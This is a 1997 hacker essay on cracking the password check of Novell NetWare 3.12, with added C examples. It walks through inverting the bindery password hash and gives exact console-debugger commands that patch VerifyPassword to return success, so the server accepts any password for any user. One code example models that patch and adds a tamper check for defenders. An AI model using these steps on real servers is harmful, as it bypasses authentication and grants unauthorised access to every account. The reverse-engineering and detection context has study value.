Novell Netware 3.12
Netware reverse engineering - basic
by The Undertacker
(03 September 1997, slightly edited by Fravia)
 Courtesy of Fravia's page of reverse engineering
 Well, this is a welcome new direction for our studies... anybody else ready
to start a new +HCU project: Netware cracking?
Here is an excerpt from The Undertacker's accompanying letter:
I will start publishing Netware 3.12 cracks  first, because this is the version 
most widely used by organizations. Then, later, we'll move on to NW4.10 & NW4.11.
Novell Netware 3.12 -- [Session - 1]
Exploring The Password Protection Scheme
By
The Undertacker -=BANDA=-
Before we start exploring Novell Netware, here is a short introduction to the
Netware operating system.
Netware provides file and print sharing. It talks to its clients over NCP (the
NetWare Core Protocol) carried on IPX. Netware is sold in several
connection-count licences (25-user, 50-user, ... versions).
If you really want to learn more about this, check Novell's web site at
www.novell.com
Finally, Netware has a number of weak points (security, connection control, ...).
Our aim is to examine those weak points and reverse the code behind them.
In this session we discuss how Netware security is organized and how to
defeat the Netware password protection scheme.
The following algorithm gives you an idea of how Netware passwords are
hashed before they are stored in the bindery (the essay calls this
"encryption", but the output is a 16-byte one-way value, not a ciphertext
that is ever decrypted).
Thanks go to {LiLiPuT} for the following information.
encryptd(int id[4], char password[])
	char    buffer[32];
	concatenate password[] to itself until it is at least 32 bytes long
	and put the result in buffer[]
	concatenate id[] to itself until it is at least 32 bytes long
	and xor the result into buffer[]
	return encryptb(buffer[])

encryptb(char buf[32])
	nibble  output[32];     // 4 bits, msb or lsb
	apply the complicated (but easily crackable!) mixing function to buf[]
	for (i = 0; i < 32; i++) output[i] = S-box[buf[i]];
	return output[]         /* 32 nibbles = 16 byte return value */

where S-box[] crunches 8-bit values down to 4-bit values.
So here is how to invert the password hash function, given the 16-byte
hash output[] value:
	for (i = 0; i < 32; i++)
		pick any x such that S-box[x] == output[i]   // 16 candidates per nibble
		buf[i] = x
	apply the reverse of the complicated function to buf[]
	concatenate id[] to itself until it is at least 32 bytes long
	and xor the result into buf[]
	use the resulting 32-byte buf[] as the inverse password
Two things to keep in mind. First, this gives you a preimage, not
necessarily the user's original password: with 16 candidates for every
nibble there are 16^32 different 32-byte buffers that hash to the same
value, and the one you pick may contain bytes that cannot be typed at a
login prompt, so you may have to try several choices. Second, because the
object id is xored in, the same password hashes differently for every
user; a preimage found for one bindery object is worthless for another.
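The inversion described above, carried through end to end, as an added example (this is not code from the essay, from {LiLiPuT} or from Novell). The S-box and the "complicated" mixing step are stand-ins chosen so that the structure is invertible; they are assumptions, not Novell's real tables. Only the shape follows the text: fill password and object id to 32 bytes, xor, mix, crunch each byte to a nibble. The sample object id is constructed for the demo. The `choice` argument of `invert` shows that every one of the 16 S-box preimages per nibble yields a valid collision.

```c
/* Toy model of the bindery password hash structure sketched above.
 * ASSUMPTION: sbox() and mix()/unmix() are stand-ins chosen to be invertible,
 * NOT Novell's real tables. Only the shape (fill to 32 bytes, XOR the object
 * id, mix, crunch each byte to a nibble) follows the text. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define BUF_LEN  32
#define HASH_LEN 16

/* Constructed sample object id for the demo (not a real bindery id). */
static const uint8_t SAMPLE_ID[4] = { 0x00, 0x00, 0x00, 0x01 };

/* Stand-in S-box: 8 bits in, 4 bits out. "high nibble XOR low nibble" gives
 * every output nibble exactly 16 preimages, which is what makes step 1 of the
 * inversion a free choice. */
static uint8_t sbox(uint8_t b) { return (uint8_t)((b >> 4) ^ (b & 0x0F)); }

static uint8_t rotl(uint8_t b, unsigned r) { r &= 7; return (uint8_t)((b << r) | (b >> ((8 - r) & 7))); }
static uint8_t rotr(uint8_t b, unsigned r) { r &= 7; return (uint8_t)((b >> r) | (b << ((8 - r) & 7))); }

/* "concatenate src to itself until it is at least 32 bytes long" */
static void fill32(const uint8_t *src, size_t len, uint8_t out[BUF_LEN]) {
    for (size_t i = 0; i < BUF_LEN; i++) out[i] = len ? src[i % len] : 0;
}

/* Stand-in mixing step: rotate each byte by its index, then chain-XOR with
 * the previous output byte. Looks messy, inverts in a single pass. */
static void mix(uint8_t buf[BUF_LEN]) {
    uint8_t prev = 0;
    for (unsigned i = 0; i < BUF_LEN; i++) { buf[i] = (uint8_t)(rotl(buf[i], i) ^ prev); prev = buf[i]; }
}
static void unmix(uint8_t buf[BUF_LEN]) {
    uint8_t prev = 0;
    for (unsigned i = 0; i < BUF_LEN; i++) { uint8_t cur = buf[i]; buf[i] = rotr((uint8_t)(cur ^ prev), i); prev = cur; }
}

/* encryptb: mix, then S-box each byte; two nibbles per output byte. */
void encryptb(const uint8_t in[BUF_LEN], uint8_t out[HASH_LEN]) {
    uint8_t buf[BUF_LEN];
    memcpy(buf, in, BUF_LEN);
    mix(buf);
    for (int k = 0; k < HASH_LEN; k++)
        out[k] = (uint8_t)((sbox(buf[2 * k]) << 4) | sbox(buf[2 * k + 1]));
}

/* encryptd: fill password and id to 32 bytes, XOR them, hand to encryptb. */
void encryptd(const uint8_t id[4], const uint8_t *pw, size_t pwlen, uint8_t out[HASH_LEN]) {
    uint8_t buf[BUF_LEN], idbuf[BUF_LEN];
    fill32(pw, pwlen, buf);
    fill32(id, 4, idbuf);
    for (int i = 0; i < BUF_LEN; i++) buf[i] ^= idbuf[i];
    encryptb(buf, out);
}

/* The inversion from the text. 'choice' (0..15) selects which of the 16
 * S-box preimages to take for every nibble: any choice yields a valid
 * preimage, which is why 16^32 different "passwords" share one hash. */
void invert(const uint8_t id[4], const uint8_t hash[HASH_LEN], unsigned choice, uint8_t out[BUF_LEN]) {
    uint8_t idbuf[BUF_LEN];
    uint8_t hi = (uint8_t)(choice & 0x0F);
    for (int i = 0; i < BUF_LEN; i++) {
        uint8_t nib = (i % 2 == 0) ? (uint8_t)(hash[i / 2] >> 4) : (uint8_t)(hash[i / 2] & 0x0F);
        out[i] = (uint8_t)((hi << 4) | (hi ^ nib));       /* sbox(out[i]) == nib */
    }
    unmix(out);                                            /* undo the mixing step */
    fill32(id, 4, idbuf);
    for (int i = 0; i < BUF_LEN; i++) out[i] ^= idbuf[i]; /* strip the object id */
}

int sbox_preimage_count(uint8_t nib) {
    int n = 0;
    for (int b = 0; b < 256; b++) if (sbox((uint8_t)b) == nib) n++;
    return n;
}

/* Hash a password, invert the hash, re-hash the preimage; 1 if it collides. */
int preimage_matches(const uint8_t id[4], const char *password, unsigned choice) {
    uint8_t h1[HASH_LEN], h2[HASH_LEN], pre[BUF_LEN];
    encryptd(id, (const uint8_t *)password, strlen(password), h1);
    invert(id, h1, choice, pre);
    encryptd(id, pre, BUF_LEN, h2);
    return memcmp(h1, h2, HASH_LEN) == 0;
}

int main(void) {
    uint8_t h[HASH_LEN], pre[BUF_LEN];
    encryptd(SAMPLE_ID, (const uint8_t *)"SECRET", 6, h);
    invert(SAMPLE_ID, h, 0, pre);
    printf("hash:     "); for (int i = 0; i < HASH_LEN; i++) printf("%02X", h[i]);
    printf("\npreimage: "); for (int i = 0; i < BUF_LEN; i++) printf("%02X", pre[i]);
    printf("\ncollides: %d\n", preimage_matches(SAMPLE_ID, "SECRET", 0));
    return 0;
}
```

The point the code makes is that the strength of such a scheme rests entirely on the "complicated function" being one-way; as soon as it can be run backwards, the 8-to-4-bit S-box at the end adds nothing, it only multiplies the number of valid preimages.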
I hope you all understand the above algorithm. If not, do not worry: skip it
and go straight to the cracking session below.
To defeat the password check you need the server console: everything that
follows is typed at the console screen, so physical access to the server is
the whole attack surface.
The Netware operating system ships with an internal debugger for developers.
We can use this debugger for most of our cracks.
Here is the way to get into the debugger.
In the console screen,
     Press :- Left Shift + Right Shift + Alt + Esc - to enter the debugger.
Now you are at the '#' prompt.
To get more information about the debugger type h, hb, he or .h.
-= CraCk SeSsion =-
The debugger's API names are CASE SENSITIVE.
I will include the complete list of Netware API names in the next session.
OK, let's rock!
In the Debugger Type,..
#u VerifyPassword       ----> unassemble VerifyPassword. This function
                              compares the password the user typed with
                              the hashed bindery entry. If they match it
                              returns EAX=0, otherwise EAX holds a
                              non-zero error value.
Press the "Enter" key to scroll the unassembled listing. Scroll until you see
the "RET" instruction.
00328F76  C3    RET     ----> The address depends on your server
                              configuration; use whatever you see here.
Now put an execution breakpoint on that address:
B = 00328F76
Leave the debugger by pressing "g". Now log in to the server from a
workstation using a wrong password.
Bang! You land inside the debugger.
Check the EAX value.
It is not equal to 0.
That means the password was wrong.
If you pressed "g" now, you would see a 'Password Incorrect' message on
your workstation.
But if you set the EAX register to 0 ("EAX=0") and then press "g", the
login goes through regardless of the password. That is a one-off bypass for
this single login attempt; to make it permanent, patch the function itself.
OK, let's start the crack!
c VerifyPassword = B8 0 0 0 0 C3   --->  This command overwrites the first
                                         six bytes of the function: B8 plus
                                         a 4-byte immediate is MOV EAX,imm32,
                                         C3 is RET.
u VerifyPassword
Now you can see our changes....
XXXXXXXX B800000000    MOV     EAX,0
XXXXXXXX C3            RET
Clear all breakpoints ("bca") and press "g".
That's it, you have done it. Novell Netware 3.12 reversed!
From now on the server still asks for a password, but accepts any password
for any user, because VerifyPassword always reports success.
Two caveats. The "c" command changes server memory only: SERVER.EXE on disk
is untouched and the check is back to normal after the next restart. And the
stub works because the function's original return is a plain RET (C3); had
it ended in RET n (C2 xx xx), the replacement would have to pop the same
number of argument bytes or the caller's stack would be left unbalanced.
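The patch and the check a defender would run against it, modelled in C as an added example (not code from the essay, and not NetWare's own code). The routine image is a constructed 32-bit x86 stand-in, not bytes from SERVER.EXE; the only thing taken from the text is the six-byte stub B8 00 00 00 00 C3. The example goes slightly beyond the text in two ways: it parameterises the returned constant, and it refuses to patch a routine whose final return is not a plain RET, for the stack-balance reason given above.

```c
/* Model of the in-memory patch applied above. The routine image below is a
 * CONSTRUCTED 32-bit x86 stand-in, not bytes from SERVER.EXE; the only thing
 * taken from the text is the 6-byte stub B8 00 00 00 00 C3 (MOV EAX,0 ; RET). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STUB_LEN 6

/* Constructed stand-in for a verification routine that always fails. */
static const uint8_t sample_verify[] = {
    0x55,              /* push ebp                 */
    0x8B, 0xEC,        /* mov  ebp, esp            */
    0x83, 0xEC, 0x20,  /* sub  esp, 0x20           */
    0x33, 0xC0,        /* xor  eax, eax            */
    0x40,              /* inc  eax   (EAX != 0)    */
    0x8B, 0xE5,        /* mov  esp, ebp            */
    0x5D,              /* pop  ebp                 */
    0xC3               /* ret        (plain RET)   */
};

/* MOV EAX, imm32 is B8 followed by the little-endian immediate; RET is C3.
 * value 0 reproduces the text's 'c VerifyPassword = B8 0 0 0 0 C3'. */
void encode_return_stub(uint32_t value, uint8_t out[STUB_LEN]) {
    out[0] = 0xB8;
    for (int i = 0; i < 4; i++) out[1 + i] = (uint8_t)(value >> (8 * i));
    out[5] = 0xC3;
}

/* Detection: does the entry point look like "return a constant"?
 * Returns 1 and stores the constant if so. */
int is_return_stub(const uint8_t *code, size_t len, uint32_t *value) {
    if (len < STUB_LEN || code[0] != 0xB8 || code[5] != 0xC3) return 0;
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--) v = (v << 8) | code[1 + i];
    if (value) *value = v;
    return 1;
}

/* The text's patch. Refuses if the routine's final return is not a plain
 * RET (C3): a routine ending in RET imm16 (C2 xx xx) pops its own arguments,
 * and replacing it with a bare C3 would leave the caller's stack unbalanced. */
int patch_always_return(uint8_t *code, size_t len, uint32_t value) {
    if (len < STUB_LEN || code[len - 1] != 0xC3) return 0;
    encode_return_stub(value, code);
    return 1;
}

/* Defender's check: compare live entry bytes with a known-good copy. */
int entry_tampered(const uint8_t *live, const uint8_t *known_good, size_t n) {
    return memcmp(live, known_good, n) != 0;
}

/* Encode then decode a stub; returns the constant read back. */
uint32_t stub_roundtrip(uint32_t value) {
    uint8_t stub[STUB_LEN];
    uint32_t v;
    encode_return_stub(value, stub);
    return is_return_stub(stub, STUB_LEN, &v) ? v : ~value;
}

/* The before/after sequence from the text on a copy of the sample routine.
 * Returns 0 when every step behaves as expected, else the failing step. */
int run_demo(void) {
    uint8_t live[sizeof sample_verify];
    uint32_t v = 1;
    memcpy(live, sample_verify, sizeof live);
    if (is_return_stub(live, sizeof live, &v)) return 1;            /* clean before  */
    if (entry_tampered(live, sample_verify, STUB_LEN)) return 2;
    if (!patch_always_return(live, sizeof live, 0)) return 3;       /* c VerifyPassword = B8 0 0 0 0 C3 */
    if (!is_return_stub(live, sizeof live, &v) || v != 0) return 4; /* u VerifyPassword shows MOV EAX,0 ; RET */
    if (!entry_tampered(live, sample_verify, STUB_LEN)) return 5;   /* known-good compare flags it */
    return 0;
}

static void dump(const char *label, const uint8_t *p, size_t n) {
    printf("%-8s", label);
    for (size_t i = 0; i < n; i++) printf(" %02X", p[i]);
    printf("\n");
}

int main(void) {
    uint8_t live[sizeof sample_verify];
    memcpy(live, sample_verify, sizeof live);
    dump("before:", live, sizeof live);
    patch_always_return(live, sizeof live, 0);
    dump("after:", live, sizeof live);
    printf("demo result: %d\n", run_demo());
    return 0;
}
```

The known-good comparison in entry_tampered is the cheap control here: a periodic check of the first bytes of authentication routines against the on-disk image (or a saved copy) catches exactly this kind of console-debugger patch, which leaves no trace on disk.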
I have kept this essay very simple because most of our readers are not
familiar with Netware, nor with the Netware debugger.
Once you have understood the basics and we are moving along smoothly,
I will include more complicated material in my sessions.
More sessions to come shortly.
 
My thanks to all the friends in the +HCU. 
Happy NetworKing... Se Ya SOOn!!!!.
	   (((((((   ReversE EngineerinG LiveS ForeveR    )))))))
(C) 1997 The Undertacker -=BANDA=- All Rights Reserved.  // SRI LANKA //
(c) The Undertacker, 1997. All rights reversed.